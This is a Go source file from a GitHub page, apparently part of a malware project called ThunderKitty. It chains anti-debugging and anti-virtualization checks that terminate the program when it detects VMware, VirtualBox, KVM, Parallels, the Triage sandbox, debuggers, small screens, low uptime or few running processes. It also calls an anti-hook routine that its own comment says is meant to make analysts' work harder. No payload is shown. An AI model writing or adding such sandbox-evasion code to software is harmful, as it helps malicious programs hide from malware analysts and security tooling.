-
Notifications
You must be signed in to change notification settings - Fork 52
/
Copy pathmain.go
119 lines (101 loc) · 4.06 KB
/
main.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
package AntiDebugVMAnalysis
import (
"log"
"os"
// AntiDebug
"github.com/EvilBytecode/GoDefender/AntiDebug/CheckBlacklistedWindowsNames"
"github.com/EvilBytecode/GoDefender/AntiDebug/InternetCheck"
"github.com/EvilBytecode/GoDefender/AntiDebug/IsDebuggerPresent"
"github.com/EvilBytecode/GoDefender/AntiDebug/ParentAntiDebug"
"github.com/EvilBytecode/GoDefender/AntiDebug/RemoteDebugger"
"github.com/EvilBytecode/GoDefender/AntiDebug/RunningProcesses"
"github.com/EvilBytecode/GoDefender/AntiDebug/UserAntiAntiDebug"
"github.com/EvilBytecode/GoDefender/AntiDebug/pcuptime"
// AntiVirtualization
"github.com/EvilBytecode/GoDefender/AntiVirtualization/KVMCheck"
"github.com/EvilBytecode/GoDefender/AntiVirtualization/MonitorMetrics"
"github.com/EvilBytecode/GoDefender/AntiVirtualization/TriageDetection"
"github.com/EvilBytecode/GoDefender/AntiVirtualization/USBCheck"
"github.com/EvilBytecode/GoDefender/AntiVirtualization/UsernameCheck"
"github.com/EvilBytecode/GoDefender/AntiVirtualization/VMWareDetection"
"github.com/EvilBytecode/GoDefender/AntiVirtualization/VirtualboxDetection"
"github.com/EvilBytecode/GoDefender/AntiVirtualization/VMArtifacts"
"github.com/EvilBytecode/GoDefender/AntiVirtualization/RepetitiveProcess"
"github.com/EvilBytecode/GoDefender/AntiVirtualization/ParallelsCheck"
)
func ThunderKitty() {
// lets just catch bunch of vms at beginning lol
if usbPluggedIn, err := USBCheck.PluggedIn(); err != nil {
os.Exit(-1)
} else if usbPluggedIn {
log.Println("[DEBUG] USB devices have been plugged in, check passed.")
} else {
os.Exit(-1)
}
if blacklistedUsernameDetected := UsernameCheck.CheckForBlacklistedNames(); blacklistedUsernameDetected {
log.Println("[DEBUG] Blacklisted username detected")
os.Exit(-1)
}
// lets make their job harder.
HooksDetection.AntiAntiDebug()
//
// AntiVirtualization checks
if vmwareDetected, _ := VMWareDetection.GraphicsCardCheck(); vmwareDetected {
log.Println("[DEBUG] VMWare detected")
os.Exit(-1)
}
if virtualboxDetected, _ := VirtualboxDetection.GraphicsCardCheck(); virtualboxDetected {
log.Println("[DEBUG] Virtualbox detected")
os.Exit(-1)
}
if kvmDetected, _ := KVMCheck.CheckForKVM(); kvmDetected {
log.Println("[DEBUG] KVM detected")
os.Exit(-1)
}
if triageDetected, _ := TriageDetection.TriageCheck(); triageDetected {
log.Println("[DEBUG] Triage detected")
os.Exit(-1)
}
if isScreenSmall, _ := MonitorMetrics.IsScreenSmall(); isScreenSmall {
log.Println("[DEBUG] Screen size is small")
os.Exit(-1)
}
if VMArtifacts := VMArtifacts.VMArtifactsDetect(); VMArtifacts {
log.Println("[DEBUG] VMArtifacts components detected. Exiting.")
os.Exit(-1)
}
if repetitiveproc, _ := RepetitiveProcess.Check(); repetitiveproc {
log.Println("[DEBUG] RepetitiveProcess detected. Exiting")
os.Exit(-1)
}
if pararelcheck, _ := ParallelsCheck.CheckForParallels(); pararelcheck {
log.Println("[DEBUG] Parallels detected. Exiting")
os.Exit(-1)
}
CheckBlacklistedWindowsNames.CheckBlacklistedWindows()
// Other AntiDebug checks
if isDebuggerPresentResult := IsDebuggerPresent.IsDebuggerPresent1(); isDebuggerPresentResult {
log.Println("[DEBUG] Debugger presence detected")
os.Exit(-1)
}
if remoteDebuggerDetected, _ := RemoteDebugger.RemoteDebugger(); remoteDebuggerDetected {
log.Println("[DEBUG] Remote debugger detected")
os.Exit(-1)
}
if connected, _ := InternetCheck.CheckConnection(); !connected {
log.Println("[DEBUG] Internet connection check failed")
os.Exit(-1)
}
if parentAntiDebugResult := ParentAntiDebug.ParentAntiDebug(); parentAntiDebugResult {
log.Println("[DEBUG] ParentAntiDebug check failed")
os.Exit(-1)
}
if runningProcessesCountDetected, _ := RunningProcesses.CheckRunningProcessesCount(50); runningProcessesCountDetected {
log.Println("[DEBUG] Running processes count detected")
os.Exit(-1)
}
if pcUptimeDetected, _ := pcuptime.CheckUptime(1200); pcUptimeDetected {
log.Println("[DEBUG] PC uptime detected")
os.Exit(-1)
}
}